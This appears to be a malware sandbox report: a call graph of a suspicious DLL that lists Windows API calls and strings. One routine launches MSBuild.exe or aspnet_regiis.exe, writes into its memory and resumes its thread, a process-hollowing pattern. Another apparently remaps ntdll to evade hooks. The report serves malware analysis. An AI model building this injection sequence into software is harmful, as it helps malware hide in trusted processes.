6e0c107b 11948->11949 11950 6e0c1140 11948->11950 11956 6e0c10b7 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11948->11956 11983 6e0c15ed 11949->11983 11952 6e0c182a __DllMainCRTStartup@12 4 API calls 11950->11952 11953 6e0c1147 11952->11953 11954 6e0c108a __RTC_Initialize 11954->11956 11986 6e0c150b InitializeSListHead 11954->11986 11956->11944 11957 6e0c1098 11957->11956 11987 6e0c15c2 11957->11987 12048 6e0c387e 11959->12048 12251 6e0c24d0 11964->12251 11968 6e0c1617 11968->11944 11970 6e0c24db 21 API calls 11971 6e0c1604 11970->11971 11971->11944 11973 6e0c1694 11972->11973 11991 6e0c19f8 IsProcessorFeaturePresent 11973->11991 11977 6e0c16a5 11978 6e0c16a9 11977->11978 12001 6e0c3861 11977->12001 11978->11948 11981 6e0c16c0 11981->11948 11982 6e0c24e6 ___scrt_uninitialize_crt 7 API calls 11982->11978 12042 6e0c16c4 11983->12042 11985 6e0c15f4 11985->11954 11986->11957 11988 6e0c15c7 ___scrt_release_startup_lock 11987->11988 11989 6e0c19f8 IsProcessorFeaturePresent 11988->11989 11990 6e0c15d0 11988->11990 11989->11990 11990->11956 11992 6e0c16a0 11991->11992 11993 6e0c24b1 11992->11993 12004 6e0c28e7 11993->12004 11996 6e0c24ba 11996->11977 11998 6e0c24c2 11999 6e0c24cd 11998->11999 12000 6e0c2923 ___vcrt_uninitialize_locks DeleteCriticalSection 11998->12000 11999->11977 12000->11996 12033 6e0c5fad 12001->12033 12005 6e0c28f0 12004->12005 12007 6e0c2919 12005->12007 12008 6e0c24b6 12005->12008 12018 6e0c2b55 12005->12018 12009 6e0c2923 ___vcrt_uninitialize_locks DeleteCriticalSection 12007->12009 12008->11996 12010 6e0c2899 12008->12010 12009->12008 12023 6e0c2a66 12010->12023 12013 6e0c28ae 12013->11998 12016 6e0c28c9 12016->11998 12017 6e0c28cc ___vcrt_uninitialize_ptd 6 API calls 12017->12013 12019 6e0c2a1d ___vcrt_InitializeCriticalSectionEx 5 API calls 12018->12019 12020 6e0c2b6f 12019->12020 12021 6e0c2b8d InitializeCriticalSectionAndSpinCount 12020->12021 12022 6e0c2b78 12020->12022 12021->12022 12022->12005 12024 6e0c2a1d ___vcrt_InitializeCriticalSectionEx 5 API calls 12023->12024 12025 6e0c2a80 12024->12025 12026 6e0c2a99 TlsAlloc 12025->12026 12027 6e0c28a3 12025->12027 12027->12013 12028 6e0c2b17 12027->12028 12029 6e0c2a1d ___vcrt_InitializeCriticalSectionEx 5 API calls 12028->12029 12030 6e0c2b31 12029->12030 12031 6e0c2b4c TlsSetValue 12030->12031 12032 6e0c28bc 12030->12032 12031->12032 12032->12016 12032->12017 12034 6e0c5fbd 12033->12034 12035 6e0c16b2 12033->12035 12034->12035 12037 6e0c5e6d 12034->12037 12035->11981 12035->11982 12039 6e0c5e74 12037->12039 12038 6e0c5eb7 GetStdHandle 12038->12039 12039->12038 12040 6e0c5f1d 12039->12040 12041 6e0c5eca GetFileType 12039->12041 12040->12034 12041->12039 12043 6e0c16d4 12042->12043 12044 6e0c16d0 12042->12044 12045 6e0c16e1 ___scrt_release_startup_lock 12043->12045 12046 6e0c182a __DllMainCRTStartup@12 4 API calls 12043->12046 12044->11985 12045->11985 12047 6e0c174a 12046->12047 12054 6e0c3e6b 12048->12054 12051 6e0c24db 12234 6e0c27c3 12051->12234 12055 6e0c3e75 12054->12055 12056 6e0c161f 12054->12056 12057 6e0c5be1 __dosmaperr 6 API calls 12055->12057 12056->12051 12058 6e0c3e7c 12057->12058 12058->12056 12059 6e0c5c20 __dosmaperr 6 API calls 12058->12059 12060 6e0c3e8f 12059->12060 12062 6e0c3d32 12060->12062 12063 6e0c3d3d 12062->12063 12064 6e0c3d4d 12062->12064 12068 6e0c3d53 12063->12068 12064->12056 12067 6e0c4493 _free 14 API calls 12067->12064 12069 6e0c3d68 12068->12069 12070 6e0c3d6e 12068->12070 12071 6e0c4493 _free 14 API calls 12069->12071 12072 6e0c4493 _free 14 API calls 12070->12072 12071->12070 12073 6e0c3d7a 12072->12073 12074 6e0c4493 _free 14 API calls 12073->12074 12075 6e0c3d85 12074->12075 12076 6e0c4493 _free 14 API calls 12075->12076 12077 6e0c3d90 12076->12077 12078 6e0c4493 _free 14 API calls 12077->12078 12079 6e0c3d9b 12078->12079 12080 6e0c4493 _free 14 API calls 12079->12080 12081 6e0c3da6 12080->12081 12082 6e0c4493 _free 14 API calls 12081->12082 12083 6e0c3db1 12082->12083 12084 6e0c4493 _free 14 API calls 12083->12084 12085 6e0c3dbc 12084->12085 12086 6e0c4493 _free 14 API calls 12085->12086 12087 6e0c3dc7 12086->12087 12088 6e0c4493 _free 14 API calls 12087->12088 12089 6e0c3dd5 12088->12089 12094 6e0c3b7f 12089->12094 12095 6e0c3b8b ___scrt_is_nonwritable_in_current_image 12094->12095 12110 6e0c412a EnterCriticalSection 12095->12110 12097 6e0c3b95 12100 6e0c4493 _free 14 API calls 12097->12100 12101 6e0c3bbf 12097->12101 12100->12101 12111 6e0c3bde 12101->12111 12102 6e0c3bea 12103 6e0c3bf6 ___scrt_is_nonwritable_in_current_image 12102->12103 12115 6e0c412a EnterCriticalSection 12103->12115 12105 6e0c3c00 12116 6e0c3e20 12105->12116 12107 6e0c3c13 12120 6e0c3c33 12107->12120 12110->12097 12114 6e0c4172 LeaveCriticalSection 12111->12114 12113 6e0c3bcc 12113->12102 12114->12113 12115->12105 12117 6e0c3e56 __fassign 12116->12117 12118 6e0c3e2f __fassign 12116->12118 12117->12107 12118->12117 12123 6e0c6b78 12118->12123 12233 6e0c4172 LeaveCriticalSection 12120->12233 12122 6e0c3c21 12122->12067 12124 6e0c6b8e 12123->12124 12125 6e0c6bf8 12123->12125 12124->12125 12128 6e0c6bc1 12124->12128 12132 6e0c4493 _free 14 API calls 12124->12132 12127 6e0c4493 _free 14 API calls 12125->12127 12150 6e0c6c46 12125->12150 12129 6e0c6c1a 12127->12129 12130 6e0c6be3 12128->12130 12138 6e0c4493 _free 14 API calls 12128->12138 12131 6e0c4493 _free 14 API calls 12129->12131 12134 6e0c4493 _free 14 API calls 12130->12134 12133 6e0c6c2d 12131->12133 12137 6e0c6bb6 12132->12137 12139 6e0c4493 _free 14 API calls 12133->12139 12135 6e0c6bed 12134->12135 12140 6e0c4493 _free 14 API calls 12135->12140 12136 6e0c6cb4 12141 6e0c4493 _free 14 API calls 12136->12141 12151 6e0c8aa7 12137->12151 12143 6e0c6bd8 12138->12143 12144 6e0c6c3b 12139->12144 12140->12125 12146 6e0c6cba 12141->12146 12179 6e0c8ba5 12143->12179 12148 6e0c4493 _free 14 API calls 12144->12148 12145 6e0c6c54 12145->12136 12149 6e0c4493 14 API calls _free 12145->12149 12146->12117 12148->12150 12149->12145 12191 6e0c6ce9 12150->12191 12152 6e0c8ab8 12151->12152 12178 6e0c8ba1 12151->12178 12153 6e0c8ac9 12152->12153 12154 6e0c4493 _free 14 API calls 12152->12154 12155 6e0c4493 _free 14 API calls 12153->12155 12159 6e0c8adb 12153->12159 12154->12153 12155->12159 12156 6e0c4493 _free 14 API calls 12157 6e0c8aed 12156->12157 12158 6e0c8aff 12157->12158 12160 6e0c4493 _free 14 API calls 12157->12160 12161 6e0c8b11 12158->12161 12162 6e0c4493 _free 14 API calls 12158->12162 12159->12156 12159->12157 12160->12158 12163 6e0c8b23 12161->12163 12165 6e0c4493 _free 14 API calls 12161->12165 12162->12161 12164 6e0c8b35 12163->12164 12166 6e0c4493 _free 14 API calls 12163->12166 12167 6e0c8b47 12164->12167 12168 6e0c4493 _free 14 API calls 12164->12168 12165->12163 12166->12164 12169 6e0c8b59 12167->12169 12170 6e0c4493 _free 14 API calls 12167->12170 12168->12167 12171 6e0c8b6b 12169->12171 12173 6e0c4493 _free 14 API calls 12169->12173 12170->12169 12172 6e0c8b7d 12171->12172 12174 6e0c4493 _free 14 API calls 12171->12174 12175 6e0c8b8f 12172->12175 12176 6e0c4493 _free 14 API calls 12172->12176 12173->12171 12174->12172 12177 6e0c4493 _free 14 API calls 12175->12177 12175->12178 12176->12175 12177->12178 12178->12128 12180 6e0c8c0a 12179->12180 12181 6e0c8bb2 12179->12181 12180->12130 12182 6e0c8bc2 12181->12182 12184 6e0c4493 _free 14 API calls 12181->12184 12183 6e0c8bd4 12182->12183 12185 6e0c4493 _free 14 API calls 12182->12185 12186 6e0c8be6 12183->12186 12187 6e0c4493 _free 14 API calls 12183->12187 12184->12182 12185->12183 12188 6e0c8bf8 12186->12188 12189 6e0c4493 _free 14 API calls 12186->12189 12187->12186 12188->12180 12190 6e0c4493 _free 14 API calls 12188->12190 12189->12188 12190->12180 12192 6e0c6cf6 12191->12192 12193 6e0c6d15 12191->12193 12192->12193 12197 6e0c8c46 12192->12197 12193->12145 12196 6e0c4493 _free 14 API calls 12196->12193 12198 6e0c6d0f 12197->12198 12199 6e0c8c57 12197->12199 12198->12196 12200 6e0c8c0e __fassign 14 API calls 12199->12200 12201 6e0c8c5f 12200->12201 12202 6e0c8c0e __fassign 14 API calls 12201->12202 12203 6e0c8c6a 12202->12203 12204 6e0c8c0e __fassign 14 API calls 12203->12204 12205 6e0c8c75 12204->12205 12206 6e0c8c0e __fassign 14 API calls 12205->12206 12207 6e0c8c80 12206->12207 12208 6e0c8c0e __fassign 14 API calls 12207->12208 12209 6e0c8c8e 12208->12209 12210 6e0c4493 _free 14 API calls 12209->12210 12211 6e0c8c99 12210->12211 12212 6e0c4493 _free 14 API calls 12211->12212 12213 6e0c8ca4 12212->12213 12214 6e0c4493 _free 14 API calls 12213->12214 12215 6e0c8caf 12214->12215 12216 6e0c8c0e __fassign 14 API calls 12215->12216 12217 6e0c8cbd 12216->12217 12218 6e0c8c0e __fassign 14 API calls 12217->12218 12219 6e0c8ccb 12218->12219 12220 6e0c8c0e __fassign 14 API calls 12219->12220 12221 6e0c8cdc 12220->12221 12222 6e0c8c0e __fassign 14 API calls 12221->12222 12223 6e0c8cea 12222->12223 12224 6e0c8c0e __fassign 14 API calls 12223->12224 12225 6e0c8cf8 12224->12225 12226 6e0c4493 _free 14 API calls 12225->12226 12227 6e0c8d03 12226->12227 12228 6e0c4493 _free 14 API calls 12227->12228 12229 6e0c8d0e 12228->12229 12230 6e0c4493 _free 14 API calls 12229->12230 12231 6e0c8d19 12230->12231 12232 6e0c4493 _free 14 API calls 12231->12232 12232->12198 12233->12122 12235 6e0c27d0 12234->12235 12241 6e0c1624 12234->12241 12236 6e0c27de 12235->12236 12242 6e0c2adc 12235->12242 12238 6e0c2b17 ___vcrt_FlsSetValue 6 API calls 12236->12238 12239 6e0c27ee 12238->12239 12247 6e0c27a7 12239->12247 12241->11944 12243 6e0c2a1d ___vcrt_InitializeCriticalSectionEx 5 API calls 12242->12243 12244 6e0c2af6 12243->12244 12245 6e0c2b0e TlsGetValue 12244->12245 12246 6e0c2b02 12244->12246 12245->12246 12246->12236 12248 6e0c27be 12247->12248 12249 6e0c27b1 12247->12249 12248->12241 12249->12248 12250 6e0c3904 ___vcrt_freefls@4 14 API calls 12249->12250 12250->12248 12257 6e0c2807 12251->12257 12253 6e0c1600 12253->11971 12254 6e0c3873 12253->12254 12255 6e0c3fee __dosmaperr 14 API calls 12254->12255 12256 6e0c160c 12255->12256 12256->11968 12256->11970 12258 6e0c2810 12257->12258 12259 6e0c2813 GetLastError 12257->12259 12258->12253 12260 6e0c2adc ___vcrt_FlsGetValue 6 API calls 12259->12260 12261 6e0c2828 12260->12261 12262 6e0c2847 12261->12262 12263 6e0c288d SetLastError 12261->12263 12264 6e0c2b17 ___vcrt_FlsSetValue 6 API calls 12261->12264 12262->12263 12263->12253 12265 6e0c2841 12264->12265 12265->12262 12266 6e0c2869 12265->12266 12267 6e0c2b17 ___vcrt_FlsSetValue 6 API calls 12265->12267 12268 6e0c2b17 ___vcrt_FlsSetValue 6 API calls 12266->12268 12269 6e0c287d 12266->12269 12267->12266 12268->12269 12270 6e0c3904 ___vcrt_freefls@4 14 API calls 12269->12270 12270->12262 12900 6e0c376e 12903 6e0c357d 12900->12903 12904 6e0c358c 12903->12904 12909 6e0c34ef 12904->12909 12907 6e0c34ef 14 API calls 12908 6e0c35b1 12907->12908 12913 6e0c3519 12909->12913 12914 6e0c34fc 12909->12914 12910 6e0c3513 12911 6e0c4493 _free 14 API calls 12910->12911 12911->12913 12912 6e0c4493 _free 14 API calls 12912->12914 12913->12907 12914->12910 12914->12912 13530 6e0c5dae GetStartupInfoW 13531 6e0c5dd4 13530->13531 13533 6e0c5e68 13530->13533 13532 6e0c7a61 26 API calls 13531->13532 13531->13533 13534 6e0c5dfc 13532->13534 13534->13533 13535 6e0c5e2c GetFileType 13534->13535 13535->13534 13447 6e0c40e9 13448 6e0c40f4 13447->13448 13449 6e0c5c62 6 API calls 13448->13449 13450 6e0c411d 13448->13450 13451 6e0c4119 13448->13451 13449->13448 13453 6e0c4141 13450->13453 13454 6e0c416d 13453->13454 13455 6e0c414e 13453->13455 13454->13451 13456 6e0c4158 DeleteCriticalSection 13455->13456 13456->13454 13456->13456 13063 6e0c37a4 13064 6e0c24e6 ___scrt_uninitialize_crt 7 API calls 13063->13064 13065 6e0c37ab 13064->13065 12375 6e0c9e25 12379 6e0c9e4d 12375->12379 12376 6e0c9e85 12377 6e0c9e7e 12388 6e0c9ee0 12377->12388 12378 6e0c9e77 12384 6e0c9ef7 12378->12384 12379->12376 12379->12377 12379->12378 12385 6e0c9f00 12384->12385 12392 6e0ca413 12385->12392 12389 6e0c9f00 12388->12389 12390 6e0ca413 __startOneArgErrorHandling 20 API calls 12389->12390 12391 6e0c9e83 12390->12391 12394 6e0ca452 __startOneArgErrorHandling 12392->12394 12397 6e0ca4d4 __startOneArgErrorHandling 12394->12397 12400 6e0ca81e 12394->12400 12396 6e0ca509 12398 6e0c0fe0 _ValidateLocalCookies 5 API calls 12396->12398 12397->12396 12403 6e0cab37 12397->12403 12399 6e0c9e7c 12398->12399 12410 6e0ca841 12400->12410 12404 6e0cab59 12403->12404 12405 6e0cab44 12403->12405 12407 6e0c4423 __dosmaperr 14 API calls 12404->12407 12406 6e0cab5e 12405->12406 12408 6e0c4423 __dosmaperr 14 API calls 12405->12408 12406->12396 12407->12406 12409 6e0cab51 12408->12409 12409->12396 12411 6e0ca86c __raise_exc 12410->12411 12412 6e0caa65 RaiseException 12411->12412 12413 6e0ca83c 12412->12413 12413->12397 13495 6e0c2565 13498 6e0c25b3 13495->13498 13499 6e0c2570 13498->13499 13500 6e0c25bc 13498->13500 13500->13499 13507 6e0c27f9 13500->13507 13503 6e0c27f9 47 API calls 13504 6e0c2602 13503->13504 13505 6e0c38c8 37 API calls 13504->13505 13506 6e0c260a 13505->13506 13508 6e0c2807 23 API calls 13507->13508 13509 6e0c27fe 13508->13509 13510 6e0c25f7 13509->13510 13511 6e0c61ac __fassign 2 API calls 13509->13511 13510->13503 13512 6e0c397e 13511->13512 13513 6e0c61f1 __fassign 37 API calls 13512->13513 13515 6e0c3989 13512->13515 13513->13515 13514 6e0c3993 IsProcessorFeaturePresent 13516 6e0c399f 13514->13516 13515->13514 13520 6e0c39b2 13515->13520 13518 6e0c41ba __fassign 8 API calls 13516->13518 13517 6e0c30ab __fassign 23 API calls 13519 6e0c39bc 13517->13519 13518->13520 13520->13517 13521 6e0c5d66 13522 6e0c5d97 13521->13522 13523 6e0c5d71 13521->13523 13523->13522 13524 6e0c5d81 FreeLibrary 13523->13524 13524->13523 12271 6e0b8f60 12282 6e0b8fbf __DllMainCRTStartup@12 12271->12282 12272 6e0c06c6 CloseHandle CloseHandle 12272->12282 12273 6e0bc730 NtWriteVirtualMemory 12273->12282 12274 6e0be1e7 NtReadVirtualMemory 12274->12282 12275 6e0bc241 NtGetContextThread 12275->12282 12276 6e0bf205 CloseHandle CloseHandle 12276->12282 12277 6e0bd07c NtWriteVirtualMemory 12346 6e0b8930 12277->12346 12279 6e0c030a CreateProcessW 12279->12282 12281 6e0bf9d6 NtAllocateVirtualMemory 12281->12282 12282->12272 12282->12273 12282->12274 12282->12275 12282->12276 12282->12277 12282->12279 12282->12281 12283 6e0bf876 NtGetContextThread 12282->12283 12284 6e0bec79 NtCreateThreadEx 12282->12284 12285 6e0c010f NtWriteVirtualMemory 12282->12285 12286 6e0c05a6 NtCreateThreadEx 12282->12286 12287 6e0bf356 12282->12287 12290 6e0baf1b GetConsoleWindow ShowWindow 12282->12290 12292 6e0b1970 27 API calls 12282->12292 12294 6e0bfb63 NtWriteVirtualMemory 12282->12294 12296 6e0be27a NtWriteVirtualMemory 12282->12296 12297 6e0be81d NtWriteVirtualMemory 12282->12297 12298 6e0bf377 GetConsoleWindow ShowWindow 12282->12298 12302 6e0bc475 NtAllocateVirtualMemory 12282->12302 12304 6e0c0399 NtGetContextThread 12282->12304 12305 6e0bef30 NtSetContextThread NtResumeThread 12282->12305 12306 6e0bc64a NtAllocateVirtualMemory 12282->12306 12307 6e0bb8ae VirtualAlloc 12282->12307 12308 6e0c0755 NtGetContextThread 12282->12308 12309 6e0bc9eb NtWriteVirtualMemory 12282->12309 12310 6e0bbd0a CreateProcessW 12282->12310 12311 6e0bf62b VirtualAlloc 12282->12311 12336 6e0b7510 12282->12336 12350 6e0b1000 12282->12350 12283->12282 12284->12282 12285->12282 12286->12282 12288 6e0c0fe0 _ValidateLocalCookies 5 API calls 12287->12288 12289 6e0bf360 12288->12289 12312 6e0b1970 12290->12312 12292->12282 12295 6e0b8930 5 API calls 12294->12295 12300 6e0bf3a4 12295->12300 12296->12282 12297->12282 12299 6e0b1970 27 API calls 12298->12299 12299->12300 12300->12282 12301 6e0b1970 27 API calls 12300->12301 12303 6e0b1000 5 API calls 12300->12303 12301->12300 12302->12282 12303->12300 12304->12282 12305->12282 12306->12282 12307->12282 12308->12282 12309->12282 12310->12282 12311->12282 12329 6e0b1999 ___scrt_uninitialize_crt __DllMainCRTStartup@12 12312->12329 12313 6e0b512f CloseHandle CloseHandle 12313->12329 12314 6e0b503e ___scrt_uninitialize_crt 12316 6e0b5088 VirtualProtect 12314->12316 12315 6e0b2f03 GetModuleFileNameA CreateFileA 12315->12329 12316->12329 12317 6e0b2c73 GetModuleHandleA 12317->12329 12318 6e0b3875 MapViewOfFile 12318->12329 12319 6e0b4191 VirtualProtect 12319->12329 12320 6e0b4a4c GetCurrentProcess 12320->12329 12321 6e0b4636 CloseHandle CloseHandle 12321->12329 12322 6e0b2ec5 K32GetModuleInformation 12322->12329 12323 6e0b2a5c GetCurrentProcess 12323->12329 12324 6e0b3503 CloseHandle 12324->12329 12325 6e0b4bba CloseHandle 12325->12329 12326 6e0b4a96 GetModuleHandleA 12326->12329 12327 6e0b4549 CloseHandle 12327->12329 12328 6e0b4eb7 CloseHandle CloseHandle 12328->12329 12329->12313 12329->12314 12329->12315 12329->12317 12329->12318 12329->12319 12329->12320 12329->12321 12329->12322 12329->12323 12329->12324 12329->12325 12329->12326 12329->12327 12329->12328 12330 6e0b42a3 VirtualProtect 12329->12330 12331 6e0b4964 12329->12331 12334 6e0b4f50 CreateFileMappingA 12329->12334 12335 6e0b3385 CreateFileMappingA 12329->12335 12330->12329 12332 6e0c0fe0 _ValidateLocalCookies 5 API calls 12331->12332 12333 6e0b496e 12332->12333 12333->12282 12334->12329 12335->12329 12342 6e0b752f __DllMainCRTStartup@12 12336->12342 12337 6e0b7b06 GetModuleHandleW 12337->12342 12338 6e0b7ea6 NtQueryInformationProcess 12338->12342 12339 6e0b864f 12340 6e0c0fe0 _ValidateLocalCookies 5 API calls 12339->12340 12341 6e0b865f 12340->12341 12341->12282 12342->12337 12342->12338 12342->12339 12344 6e0b86af GetModuleHandleW 12342->12344 12345 6e0b88f5 GetModuleHandleW 12342->12345 12354 6e0b51e0 12342->12354 12344->12342 12345->12342 12347 6e0b898e 12346->12347 12348 6e0c0fe0 _ValidateLocalCookies 5 API calls 12347->12348 12349 6e0b8efa 12348->12349 12349->12282 12353 6e0b105f 12350->12353 12351 6e0c0fe0 _ValidateLocalCookies 5 API calls 12352 6e0b18f6 12351->12352 12352->12282 12353->12351 12355 6e0b5211 12354->12355 12356 6e0c0fe0 _ValidateLocalCookies 5 API calls 12355->12356 12357 6e0b702b 12356->12357 12357->12342 12414 6e0c1627 12415 6e0c162f ___scrt_release_startup_lock 12414->12415 12418 6e0c2c9f 12415->12418 12417 6e0c1657 12419 6e0c2cae 12418->12419 12420 6e0c2cb2 12418->12420 12419->12417 12423 6e0c2cbf 12420->12423 12424 6e0c3fee __dosmaperr 14 API calls 12423->12424 12425 6e0c2cbb 12424->12425 12425->12417 13474 6e0ca127 13475 6e0ca140 __startOneArgErrorHandling 13474->13475 13476 6e0ca565 20 API calls 13475->13476 13477 6e0ca169 __startOneArgErrorHandling 13475->13477 13476->13477 12797 6e0c6ea0 12798 6e0c6eda 12797->12798 12799 6e0c4423 __dosmaperr 14 API calls 12798->12799 12804 6e0c6eee 12798->12804 12800 6e0c6ee3 12799->12800 12801 6e0c4366 __fassign 25 API calls 12800->12801 12801->12804 12802 6e0c0fe0 _ValidateLocalCookies 5 API calls 12803 6e0c6efb 12802->12803 12804->12802 12426 6e0c9221 12427 6e0c9245 12426->12427 12428 6e0c925e 12427->12428 12430 6e0ca127 __startOneArgErrorHandling 12427->12430 12431 6e0c92a8 12428->12431 12434 6e0c9f33 12428->12434 12433 6e0ca169 __startOneArgErrorHandling 12430->12433 12442 6e0ca565 12430->12442 12435 6e0c9f46 DecodePointer 12434->12435 12436 6e0c9f56 12434->12436 12435->12436 12437 6e0c9f9a 12436->12437 12438 6e0c9f85 12436->12438 12439 6e0c9fe1 12436->12439 12437->12439 12441 6e0c4423 __dosmaperr 14 API calls 12437->12441 12438->12439 12440 6e0c4423 __dosmaperr 14 API calls 12438->12440 12439->12431 12440->12439 12441->12439 12443 6e0ca59e __startOneArgErrorHandling 12442->12443 12444 6e0ca841 __raise_exc RaiseException 12443->12444 12445 6e0ca5c5 __startOneArgErrorHandling 12443->12445 12444->12445 12446 6e0ca608 12445->12446 12447 6e0ca5e3 12445->12447 12448 6e0cab37 __startOneArgErrorHandling 14 API calls 12446->12448 12453 6e0cab66 12447->12453 12450 6e0ca603 __startOneArgErrorHandling 12448->12450 12451 6e0c0fe0 _ValidateLocalCookies 5 API calls 12450->12451 12452 6e0ca62c 12451->12452 12452->12433 12454 6e0cab75 12453->12454 12455 6e0cabe9 __startOneArgErrorHandling 12454->12455 12456 6e0cab94 __startOneArgErrorHandling 12454->12456 12457 6e0cab37 __startOneArgErrorHandling 14 API calls 12455->12457 12459 6e0cabe2 12456->12459 12460 6e0cab37 __startOneArgErrorHandling 14 API calls 12456->12460 12458 6e0cabfe 12457->12458 12458->12450 12459->12450 12460->12459 12827 6e0c5f21 12828 6e0c5f2d ___scrt_is_nonwritable_in_current_image 12827->12828 12839 6e0c412a EnterCriticalSection 12828->12839 12830 6e0c5f34 12840 6e0c7a61 12830->12840 12833 6e0c5f52 12859 6e0c5f78 12833->12859 12838 6e0c5e6d 2 API calls 12838->12833 12839->12830 12841 6e0c7a6d ___scrt_is_nonwritable_in_current_image 12840->12841 12842 6e0c7a76 12841->12842 12843 6e0c7a97 12841->12843 12845 6e0c4423 __dosmaperr 14 API calls 12842->12845 12862 6e0c412a EnterCriticalSection 12843->12862 12846 6e0c7a7b 12845->12846 12847 6e0c4366 __fassign 25 API calls 12846->12847 12851 6e0c5f43 12847->12851 12848 6e0c7aa3 12852 6e0c7acf 12848->12852 12863 6e0c79b1 12848->12863 12851->12833 12853 6e0c5db7 GetStartupInfoW 12851->12853 12870 6e0c7af6 12852->12870 12854 6e0c5e68 12853->12854 12855 6e0c5dd4 12853->12855 12854->12838 12855->12854 12856 6e0c7a61 26 API calls 12855->12856 12857 6e0c5dfc 12856->12857 12857->12854 12858 6e0c5e2c GetFileType 12857->12858 12858->12857 12874 6e0c4172 LeaveCriticalSection 12859->12874 12861 6e0c5f63 12862->12848 12864 6e0c4436 __dosmaperr 14 API calls 12863->12864 12866 6e0c79c3 12864->12866 12865 6e0c79d0 12867 6e0c4493 _free 14 API calls 12865->12867 12866->12865 12868 6e0c5c62 6 API calls 12866->12868 12869 6e0c7a25 12867->12869 12868->12866 12869->12848 12873 6e0c4172 LeaveCriticalSection 12870->12873 12872 6e0c7afd 12872->12851 12873->12872 12874->12861 13363 6e0c40a3 13371 6e0c5b63 13363->13371 13366 6e0c40b7 13367 6e0c3fee __dosmaperr 14 API calls 13368 6e0c40bf 13367->13368 13369 6e0c40cc 13368->13369 13370 6e0c40cf __DllMainCRTStartup@12 6 API calls 13368->13370 13370->13366 13372 6e0c5a81 __dosmaperr 5 API calls 13371->13372 13373 6e0c5b7f 13372->13373 13374 6e0c5b97 TlsAlloc 13373->13374 13375 6e0c40ad 13373->13375 13374->13375 13375->13366 13375->13367 12826 6e0c56f8 GetCommandLineA GetCommandLineW 13478 6e0c7139 13481 6e0c6eee 13478->13481 13479 6e0c0fe0 _ValidateLocalCookies 5 API calls 13480 6e0c6efb 13479->13480 13481->13479 13481->13481 12461 6e0c963b IsProcessorFeaturePresent 13457 6e0c38f4 13458 6e0c38f7 13457->13458 13459 6e0c3979 __fassign 37 API calls 13458->13459 13460 6e0c3903 13459->13460 12875 6e0c2f35 12878 6e0c38c8 12875->12878 12879 6e0c38d4 ___scrt_is_nonwritable_in_current_image 12878->12879 12880 6e0c3e97 __fassign 37 API calls 12879->12880 12883 6e0c38d9 12880->12883 12881 6e0c3979 __fassign 37 API calls 12882 6e0c3903 12881->12882 12883->12881 12805 6e0c26b0 12806 6e0c26c2 12805->12806 12808 6e0c26d0 12805->12808 12807 6e0c0fe0 _ValidateLocalCookies 5 API calls 12806->12807 12807->12808 12809 6e0c6ab0 12812 6e0c6a37 12809->12812 12813 6e0c6a43 ___scrt_is_nonwritable_in_current_image 12812->12813 12820 6e0c412a EnterCriticalSection 12813->12820 12815 6e0c6a7b 12821 6e0c6a99 12815->12821 12816 6e0c6a4d 12816->12815 12818 6e0c6e45 __fassign 14 API calls 12816->12818 12818->12816 12820->12816 12824 6e0c4172 LeaveCriticalSection 12821->12824 12823 6e0c6a87 12824->12823 12884 6e0c2330 12885 6e0c234e 12884->12885 12896 6e0c22f0 12885->12896 12897 6e0c230f 12896->12897 12898 6e0c2302 12896->12898 12899 6e0c0fe0 _ValidateLocalCookies 5 API calls 12898->12899 12899->12897
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Memory$Thread$Write$Context$CreateWindow$Allocate$AllocCloseConsoleHandleProcessShow$ReadResume
                                                                                    • String ID: &9$&9$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$C~X$C~X$Cs>$D$K[R$MZx$R#*~$j9kM$j9kM$kernel32.dll$ntdll.dll$}K|M$'-$'-$t+$t+
                                                                                    • API String ID: 2346638825-2682533363
                                                                                    • Opcode ID: 90b97c6c6236fe6abe2cbc84953c687703f31866deb9ae6fd8665c88bf1b5798
                                                                                    • Instruction ID: 06a45bc1d78f8957b7305ca1d1a563a711c1da64ded5734a4d8dc014521e578b
                                                                                    • Opcode Fuzzy Hash: 90b97c6c6236fe6abe2cbc84953c687703f31866deb9ae6fd8665c88bf1b5798
                                                                                    • Instruction Fuzzy Hash: 8FD32376A446118FDF088EBCCDE83CD7BE2BB86351F108294D819DB394D6368A89DF45
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$Close$FileModule$CreateCurrentMappingProcessProtectVirtual$InformationView
                                                                                    • String ID: $wt$$wt$@$L^5[$L^5[$Ty|X$Ty|X$^J:$`a-$`a-$iRnF$o{IA$vZ*8
                                                                                    • API String ID: 1348546524-1338951784
                                                                                    • Opcode ID: 0a6dd9fae87cd891d9f9d8f9cb40febd3872d2a15ba5b916896fb388a79f0567
                                                                                    • Instruction ID: 967fd7ff83d19c510216fc67e705733bcbf1a3718ad8947a1fe515e590e2922e
                                                                                    • Opcode Fuzzy Hash: 0a6dd9fae87cd891d9f9d8f9cb40febd3872d2a15ba5b916896fb388a79f0567
